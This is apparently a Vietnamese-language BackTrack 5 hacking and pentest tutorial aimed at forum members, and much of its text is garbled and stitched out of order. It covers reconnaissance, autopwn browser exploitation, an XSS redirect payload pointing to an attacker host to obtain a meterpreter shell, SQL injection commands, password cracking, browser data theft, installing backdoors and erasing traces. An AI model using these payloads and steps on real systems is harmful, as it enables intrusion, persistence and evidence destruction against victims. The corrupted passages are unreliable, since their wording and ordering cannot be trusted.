Đang tải... (xem toàn văn)
Tài liu hng dn này cutynhangheo dành tng cho anh em HCEGroup và TheGioiMang.OrG nhân ngày reopen ca 2 din đàn thân yêu nói trên .Và cutynhangheo có đôi li tâm s vi anh em mi vào chi trò ngh thut này cái nhé .Trong ngh thut hack không có cái gi là s li bing và chây ý, anh em nên quan nim 1 điu khi ta cm thy tha mãn vi nhng gì ta đang có tc là lúc đó ta bt đu lc hu vi th gii .Trong ngh thut hack kin thc, k nng, t duy, s ranh ma và thêm mt chút may mn luôn luôn đi chung vi nhau .Vì vy nu ta cm thy mình đã có đc nhng gì mình mun thì lúc đó mình bt đu mt tt c .Cutynhangheo cng xin nói rng tài liu này ch dùng đ tham kho và s dng đ thc nghim tn công ( pentest ) trong môi trng lab hoc c quan, t chc có nhu cu tn công thc nghim trên h thng ca chính h .Kin thc trong cun sách hng dn này do cutynhangheo thu thp và tham kho nhiu ngun trên Internet, chân thành cm n các tác gi v ngun tài liu mà cutynhangheo đã tham kho qua .
Tài liu hng dn s dng BackTrack 5 – Ting Vit 2012 Ngi biên dch : cutynhangheo@gmail.com Trang 1 Tài liu hng dn s dng BackTrack 5 – Ting Vit Tài liu hng dn s dng BackTrack 5 – Ting Vit 2012 Ngi biên dch : cutynhangheo@gmail.com Trang 2 Mc lc Li nói đu 3 Phn I : Thu thp thông tin và gii thiu v các công c VA 4 1. Thu thp thông tin : 4 2. ánh giá l hng : 6 Phn II : Các b công c khai thác ( exploit tools ) và frameworks 10 1. B công c Metasploit Armitage : 10 2. B công c Social-Engineer Tookit : 11 3. B công c leo thang đc quyn (Privilege escalation tools ) : 12 4. B công c John the Ripper : 13 Phn III : Các b công c khai thác và frameworks – tip theo 15 1. ánh cp các thông tin t trình duyt : 15 2. Thc nghim k thut đánh cp thông tin : 15 3. B công c Hashcat trong BackTrack 5 : 17 4. Thc nghim k thut leo thang đc quyn : 18 5. Khai thác SQL Injection trong BackTrack 5 : 18 6. S tht bt ng đng sau các công c mang tên khai thác t đng : 19 Phn IV : Làm th nào đ n mình 20 1. Ti sao phi n mình ? 20 2. OS backdoor Cymothoa : 20 3. Meterpreter có phi là backdoor : 22 4. Li dng l hng đ có backdoor : 23 Phn V : Chi tit mt cuc tn công gi đnh 24 1. B công c Autoscan Network trong BackTrack 5 : 24 2. Tài nguyên l hng trc tuyn : 24 3. Pentest mc tiêu : 25 4. Xóa b du vt : 26 5. Tng quan v mô hình bo mt Windows : 26 Tài liu hng dn s dng BackTrack 5 – Ting Vit 2012 Ngi biên dch : cutynhangheo@gmail.com Trang 3 Li nói đu Tài liu hng dn này cutynhangheo dành tng cho anh em HCEGroup và TheGioiMang.OrG nhân ngày reopen ca 2 din đàn thân yêu nói trên .Và cutynhangheo có đôi li tâm s vi anh em mi vào chi trò ngh thut này cái nhé .Trong ngh thut hack không có cái gi là s li bing và chây ý, anh em nên quan nim 1 điu khi ta cm thy tha mãn vi nhng gì ta đang có tc là lúc đó ta bt đu lc hu vi th gii .Trong ngh thut hack kin thc, k nng, t duy, s ranh ma và thêm mt chút may mn luôn luôn đi chung vi nhau .Vì vy nu ta cm thy mình đã có đc nhng gì mình mun thì lúc đó mình bt đu mt tt c .Cutynhangheo cng xin nói rng tài liu này ch dùng đ tham kho và s dng đ thc nghim tn công ( pentest ) trong môi trng lab hoc c quan, t chc có nhu cu tn công thc nghim trên h thng ca chính h .Kin thc trong cun sách hng dn này do cutynhangheo thu thp và tham kho nhiu ngun trên Internet, chân thành cm n các tác gi v ngun tài liu mà cutynhangheo đã tham kho qua . Ln na cutynhangheo xin nhc li tài liu này cutynhangheo biên dch li và cung cp cho anh em ch nhm mc đích hc tp và nghiên cu, cutynhangheo không chu trách nhim vic anh em s dng kin thc, k thut và t duy trong cun tài liu này dùng đ vi phm pháp lut nc Cng Hòa Xã Hi Ch Ngha Vit Nam .Mi hành vi mo danh hay s dng các kin thc nói trên cutynhangheo không chu trách nhim trc pháp lut . Tài liu hng dn s dng BackTrack 5 – Ting Vit 2012 Ngi biên dch : cutynhangheo@gmail.com Trang 4 Phn I : Thu thp thông tin và gii thiu v các công c VA Phiên bn BackTrack 5 có tên mã là “Revolution” ( tm dch là “Ci tin” ), phiên bn này rt đc gii bo mt (nht là gii Hack) mong đi; phiên bn này đc phát hành vào tháng 05 nm 2011 .So vi phiên bn BackTrack 4 R2 thì phiên bn này có nhiu s phát trin mnh m hn rt nhiu .Phiên bn BackTrack 5 này đc cho rng các nhà phát trin đã xây dng li t đu, cung cp cho chúng ta nhng ci tin tt hn và cng nh fix các li so vi phiên bn BackTrack 4 R2 trc đó . BackTrack 5 đc đt tên theo mt thut toán đc gi là “backtracking” .BackTrack 5 cung cp mt b các công c t crack password, pentest và scan ports .BackTrack 5 có 12 b các công c đc th hin nh hình 1 bên di . Hình 1 : Các b công c trong BackTrack 5 Ngi kim tra bo mt ( tm gi là Pentester – vi nhng ngi nh anh em chúng ta tm gi là sript kiddies, nói dân dã 1 tí là dân đi hack, cutynhangheo xin nhc li là chúng ta cha phi là hacker thc th OK ! ) thng thc hin các quá trình tn công thc nghim theo 5 bc ( tùy vào tng môi trng và trng hp c th có th nhiu hn 5 bc ) nh sau : 1. Bc 1 là thu thp thông tin ca h thng cn tn công thc nghim . 2. Bc 2 là scan bugs ( quét li ) và đánh giá các đim yu có th có ca h thng cn tn công thc nghim . 3. Bc 3 là tip cn vi h thng cn tn công thc nghim thông qua các đim yu có th có ca h thng đó . 4. Bc 4 là duy trì truy cp vi h thng cn tn công thc nghim ( nói có v khìn khìn nhng cutynhangheo ngh đây là bc to 1 backdoor cho ln truy cp sau vào h thng đó ) . 5. Bc 5 là xóa b tt c các du vt ( trong phim thì gi là “phi tang, dit chng”; hehehe ) . Trong phn hng dn tn công thc nghim ( pentest ) vi BackTrack 5 này, chúng ta s cùng xem xét qua phn thu thp thông tin và b công c đánh giá các l hng ( nu có ) đc cung cp trong phiên bn BackTrack 5 này nhé . 1. Thu thp thông tin : Tài liu hng dn s dng BackTrack 5 – Ting Vit 2012 Ngi biên dch : cutynhangheo@gmail.com Trang 5 Thu thp thông tin là bc tin hành đu tiên và cc k quan trng trong quá trình tn công thc nghim .Trong bc này, pentester và attacker s thu thp và có đc các thông tin s b ca mc tiêu cn tn công nh h thng mng mc tiêu, các cng đang m, h thng máy đang live và các dch v đang chy trên tng cng đó .Theo bn ta thu thp đc gì ? Rt đn gin ta s có đc 1 bng thông tin v s đ cu trúc ca mc tiêu, bên cnh đó ta còn có thông tin v các h thng và h thng mng đang đc s dng ca mc tiêu .Hình 2 bên di đây là hình chp ca công c Zenmap, BackTrack cung cp công c này đ giúp pentester và attacker có th thu thp đc thông tin và phân tích h thng mng ca mc tiêu . Hình 2 : Công c Zenmap UI trong BackTrack 5 Các ch đ scan ca Zenmap s cung cp cho ta thông tin v mc tiêu nh dch v đang chy trên tng cng, phiên bn h điu hành ca mc tiêu, đng đi đn mc tiêu, workgroups và tài khon ngi dùng .Các thông tin này thc s hu ích vi phng pháp “white box testing” ( tt nhiên cng hu ích vi attacker ) . Mt công c thu thp thông tin khác trong BackTrack 5 đó là CMS identification và IDS – IPS identification dùng đ thu thp thông tin và phân tích cho ng dng web .CMS identification s cung cp các thông tin s b v h thng CMS mc tiêu, b công c này có th đc dùng đ đánh giá các l hng trên h thng CMS và điu thun tin nht là b công c này cung cp các exploit ( khai thác ) có sn đ pentester và attacker có th kim tra trên h thng mc tiêu .Các công c nh joomscan ( CMS Joomla ) s đc nói sau trong phn hng dn này . Mt công c thú v và cc k mnh khác na là Maltego, công c này thng dùng đ phân tích v SMTP .Hình 3 bên di cho thy Maltego đang hot đng . Tài liu hng dn s dng BackTrack 5 – Ting Vit 2012 Ngi biên dch : cutynhangheo@gmail.com Trang 6 Hình 3 : Công c Maltego UI trong BackTrack 5 Trên bng Palette ca Maltego cho ta thy các thông tin nh DNS Name, Domain, Location, URL, email và các thông tin chi tit khác v website .Maltego s dng các tùy bin khác nhau trên các entities cung cp cho pentester và attacker các thông tin chi tit cn thit v mc tiêu .Maltego cung cp mt kt qu trc quan bng giao din đ ha v các thông tin thu thp đc ca mc tiêu . 2. ánh giá l hng : Bc th 2 trong tn công thc nghim pentest là đánh giá các l hng ( nu có ) .Sau khi đã thc hin bc đu tiên thành công . Thông tin và s đ t chc ca mc tiêu có đc thông qua footprinting ( nh hi xa cutynhangheo đc đn đây c nh nh là “in du n” ), lúc này chúng ta s tin hành đánh giá phân tích các đim yu hoc các l hng trong h thng cn tn công .Trên internet hin nay có rt nhiu trang web v bo mt cung cp danh sách các l hng có th s dng đ khai thác, nhng chúng ta s ch tp trung vào nhng gì BackTrack 5 cung cp trong series hng dn này nhé . Web application scans đc s dng đ đánh giá và tìm các l hng ca ng dng web .Hình 4 bên di đây gii thiu v công c joomscan trong BackTrack 5 .Joomscan có tính nng là s dng các l hng đc cung cp trong tài nguyên đ tìm kim l hng ca website chy trên nn Joomla . Tài liu hng dn s dng BackTrack 5 – Ting Vit 2012 Ngi biên dch : cutynhangheo@gmail.com Trang 7 Hình 4 : Công c Joomscan Joomscan s dng câu lnh nh sau : ./joomscan.pl –u <string> -x proxy:port Phn <string> chính là Website chy Joomla cn tn công .Joomscan có các tùy chn kèm theo nh sau kim tra phiên bn ca Joomla, kim tra Server, kim tra Firewall đang hot đng …Nh hình 4 trên Website Joomla mc tiêu đang chy trên máy ch web Apache Server và phiên bn PHP đang s dng là 5.5.16 . OpenVAS ( Open Vulnerability Assessment System ) trong BackTrack 5 : M Application Backtrack Vulnerability scanners OpenVAS s cung cp cho bn mt danh sách các tùy chn nh hình 5 bên di . Tài liu hng dn s dng BackTrack 5 – Ting Vit 2012 Ngi biên dch : cutynhangheo@gmail.com Trang 8 Hình 5 : Các tùy chn ca OpenVAS trong BackTrack 5 . OpenVAS là mt công c mnh trong vic phân tích và đánh giá l hng đi vi mc tiêu cn tn công .Nhng trc khi s dng b công c này nhà cung cp khuyn cáo bn cn thit lp chng thc vi tùy chn OpenVAS MkCert .Sau đó, chúng ta cn to mt tài khon ngi dùng mi t trình menu nh trong hng dn này . Ngi dùng có th tùy chnh đ áp dng các rule ca mình, hoc s đc cung cp mt tp hp rng bng cách nhn t hp phím Ctrl + D .Khi mt ngi dùng mi đã đc thêm vào vi các thông tin đng nhp, chúng ta đã có th bt đu s dng b công c này . Tài liu hng dn s dng BackTrack 5 – Ting Vit 2012 Ngi biên dch : cutynhangheo@gmail.com Trang 9 Hình 6 : Quá trình thêm tài khon ca OpenVAS OpenVAS hot đng đánh giá l hng trên mô hình Client/Server .Bn nên cp nht thng xuyên danh sách các l hng mi cho th vin ca OpenVAS đ có th thc hin các bc kim tra có hiu qu nht . OpenVAS và Nessus Scanner : Nessus Scanner là b công c phân tích và đánh giá l hng t đng .Chúng ta hãy lt qua xem s khác bit gia 2 b công c này . Nessus Scanner có 2 phiên bn, min phí và tr tin ( cái v này làm nhiu dân đi hack nh chúng ta vô cùng ái ngi nh ! Cha hack mà đã tn tin ri ), trong khi đó OpenVAS thì li hoàn toàn min phí ( cái này đc àh nghen, đng bao gi có suy ngh đ free là đ cùi anh em nhé, có nhng đ free mà cht lng ngon hn hn đ tr tin đàng hoàng, mà xài đ free thì các bác mun đánh bn quyn cng chng có c gì xi đc anh em ta ) .Theo đánh giá gn đây cho bit thì các tài nguyên cung cp các plugins cho 2 b công c này có s khác nhau đáng k, và tùy thuc vào nhn đnh ca mi ngi s đa ra nhn xét là s có 1 b công c đc khuyên không nên s dng, tt nhiên 1 chng trình scan t đng s có th đa ra nhng đánh giá sai lm, điu này là không th tránh khi ( anh em s hi cutynhangheo ti sao sai lm còn gii thiu, cutynhangheo xin tr li vì bn cht chng trình do con ngi lp trình ra, nó ch bit làm theo ch nó không có suy ngh nh con ngi nhé ). Trên internet có rt nhiu nhóm đc lp ra đ hng dn cho nhau cách s dng các b công c h tr khác, tt nhiên có c các b công c scan t đng, nhng cutynhangheo xin khuyn cáo vi anh em nh sau ta ch s dng các b công c scan t đng đ đánh giá toàn din các l hng ca các mc tiêu cn tn công .BackTrack 5 cng cung cp các b công c khác cùng th loi nh các b công c CISCO, ngha là các b công c này đc s dng đ tìm l hng trên h thng mng chy phn cng CISCO .Các Fuzzer cng đc cung cp, đc phân thành 2 loi Network Fuzzers và VOIP Fuzzers . ó là điu gii thích ti sao BackTrack 5 đc cung cp rt nhiu b công c đ thu thp thông tin và đánh giá l hng .Trong phn hng dn này cutynhangheo s c gng gii thiu mt hoc hai b công c mà cutynhangheo cm thy hu dng cho anh em nhé ( còn li nu anh em mun nâng cao skill thì làm n t lên Google Search dùm cái h, có 1 câu ngn ng “Tôi ch cho cái cn câu ch tôi không cho con cá” ) . Tài liu hng dn s dng BackTrack 5 – Ting Vit 2012 Ngi biên dch : cutynhangheo@gmail.com Trang 10 Phn II : Các b công c khai thác ( exploit tools ) và frameworks Trong phn đu ca cun hng dn v BackTrack 5 này, chúng ta đã đi qua 2 bc là thu thp thông tin và đánh giá l hng vi các b công c đc gii thiu trên .Trong phn hai này, chúng ta s đc gii thiu v các b công c đ khai thác các l hng t xa và tìm hiu làm th nào đ s dng các exploitation frameworks đ leo thang đc quyn ví d nh s dng John the Ripper đ crack mt khu và truy cp vào mt h thng Windows t xa nhé . 1. B công c Metasploit Armitage : Metasploit Armitage là phiên bn giao din đ ha ca b công c khai thác l hng ni ting Metasploit Framework .Cutynhangheo s vit mt series v hng dn s dng Metasploit trong thi gian sp ti và s cung cp sm cho anh em .Trong cun sách hng dn v BackTrack 5 này, chúng ta s đc gii thiu cách s dng autopwn đ khai thác l hng trình duyt trên h thng Windows XP bng b công c Metasploit Armitage . Hình 7 : B công c Metasploit Armitage ; h thng Windows b xâm nhp t xa đc th hin bng màu đ .Giao din console bên di cho thy quá trình s dng autopwn đ khai thác l hng trình duyt trên h thng … Armitage cng thu thp đc thông tin v h điu hành ca mc tiêu tn công . Vi phn hng dn khai thác này, anh em cn 1 website b li cross-site scripting ( XSS ) vi l hng là URL redirection ( chuyn hng URL ) .Khi victim nhp chut vào 1 URL c th nào đó trên trình duyt, h thng ca victim s to ra mt meterpreter shell .on code URL redirection s có dng nh sau : http://www.xyz?c="><meta HTTPEQUIV="REFRESH" content="0; url=http://attacker"> [...]... mu n ( ví d leo lên quy BackTrack 5 cung c p cho chúng ta 1 lo t các b công c nhu c u th c ti n này, gi i i biên d ch : cutynhangheo@gmail.com ú v OK ! ) Gi có th th c thi các payloads và th c c quy ng nh ng Trang 12 Tài li ng d n s d ng BackTrack 5 Hình 11 : Các phân lo i trong b công c c quy n, m i lo ngh anh em s d Ti ng Vi t 2012 c quy n trong BackTrack 5 y, BackTrack 5 cung c p 4 phân lo i trong... xóa s ch Vì v y, chúng ta nên cài bookdoor ho c có th quay l i victim b t k lúc nào 5 T ng quan v mô hình b o m t Windows : Mô hình b o m t c n M i biên d ch : cutynhangheo@gmail.com i dùng có 1 SID duy nh t SID s có d ng Trang 26 Tài li ng d n s d ng BackTrack 5 Ti ng Vi t 2012 S-1 -5- 21-9867 453 210-23897 653 41-23768 956 -1023 Red - Revision level Green Identified Authority Value Orange Domain or local... i bên th p các m t 3 B công c Hashcat trong BackTrack 5 : Hashcat là b công c mi n phí, có nhi u c i ti n t ng, công c ph c h i m t kh u trên nhi u h u hành Các n n t c h tr bao g m CUDA, OpenCL và CPU, và m t s i biên d ch : cutynhangheo@gmail.com Trang 17 Tài li ng d n s d ng BackTrack 5 Ti ng Vi t 2012 Hình 17 : Các câu l nh c a Hashcat trong BackTrack 5 Trong ph ng d th Hashcat v i l i chú thích... t s k thu c quy n khác n bi c nhi , c n cù ng c và i biên d ch : cutynhangheo@gmail.com Trang 14 Tài li ng d n s d ng BackTrack 5 Ti ng Vi t 2012 Ph n III : Các b công c khai thác và frameworks ti p theo t nhi u b công c pentest frameworks c ch i n cutynhangheo quy t tâm vi t ph ng d n s d ng BackTrack 5 ph n th cùng anh em tìm hi u và khám phá các b công c khai thác các l i c a trình duy t ch ng h... escalation Online attacks / Offline attacks c phát tri làm nh ng vi c này H u h t các ti n trình trong h th u có th c th c thi v i quy n t s ít, quy c th c thi BackTrack 5 có các b công c u ki n thu n l c quy n 5 Khai thác SQL Injection trong BackTrack 5 : c x p h ng s 1 trong OWASP Top 10 l h ng v b o m t trong ng d ng web Nó có th c th c hi n khai thác b ng tay ho c b ng các b công c khai thác t ng pháp... biên d ch : cutynhangheo@gmail.com Trang 18 Tài li ng d n s d ng BackTrack 5 Trong ph n ng d n này chúng ta ch Injection t ng vào website victim C u trúc câu l c n b công c Ti ng Vi t 2012 SQL python DarkMySQLi.py u http://target B công c này s scan toàn b website victim, b ng cách s d ng câu l nh trên trong console ng d c a b công c trên trong BackTrack 5 là /pentest/web/DarkMySQLi 6 S th t b t... s không h hay bi t s t n t i c a backdoor, ngo i tr victim phát hi n hay nghi ng m ub th ng c a h c id c a ti n trình trong BackTrack 5 chúng ta s d ng câu l nh ps aux trong môi ng Cymothoa shell i biên d ch : cutynhangheo@gmail.com Trang 21 Tài li ng d n s d ng BackTrack 5 Ti ng Vi t 2012 3 Meterpreter có ph i là backdoor : Trong ph c gi i thi t ph n không th thi u c a b công c Metasploit Framework... công và xâm nh p Trong ph ng d n k ti n k t thúc trong series ng d n s d ng BackTrack 5, cutynhangheo s trình bày m t cu c t n công d a trên m t k ch b n gi nh và s s d th c hi n, cu c t n công gi nh này s s d ng t t c các thu c gi i thi u các ph n trên i biên d ch : cutynhangheo@gmail.com Trang 23 Tài li ng d n s d ng BackTrack 5 Ph n V : Chi ti t m t cu c t n công gi t Ti ng Vi t 2012 nh Trong b n ph... 7, 1 máy o ch y BackTrack 5 và 1 s máy o ch y các Windows khác Chúng ta s c c a quá trình t n công và c g ng xâm nh p vào h th ng m ng này nhé ng 1 B công c Autoscan Network trong BackTrack 5 : Sau khi k t n i vào h th ng m u tiên chúng ta c n scan c u trúc h th ng m ng và ki m tra xem các h th th ng m th c hi n vi c này, chúng ta s d ng b công c ng d n b công c Application Autoscan Backtrack Information... ho c các thông tin chi ti t v tài chính; và có th có c c các thông tin nh y c m c a công ty trong h m i th nh y c u mu p Vì v y, ki m tra b t k các d li u có th s b p là m c r t quan trông trong quá trình pentest, nó chính là m và trung th c nh ch Hình 14 i cho th y s thi t h i s có c a victim i biên d ch : cutynhangheo@gmail.com Trang 15 Tài li ng d n s d ng BackTrack 5 Ti ng Vi t 2012 Hình 14 : Quá . bn BackTrack 4 R2 trc đó . BackTrack 5 đc đt tên theo mt thut toán đc gi là “backtracking” .BackTrack 5 cung cp mt b các công c t crack password, pentest và scan ports .BackTrack. dng BackTrack 5 – Ting Vit 2012 Ngi biên dch : cutynhangheo@gmail.com Trang 1 Tài liu hng dn s dng BackTrack 5 – Ting Vit Tài liu hng dn s dng BackTrack 5 –. s dng là 5. 5.16 . OpenVAS ( Open Vulnerability Assessment System ) trong BackTrack 5 : M Application Backtrack Vulnerability scanners OpenVAS s cung cp cho bn mt danh sách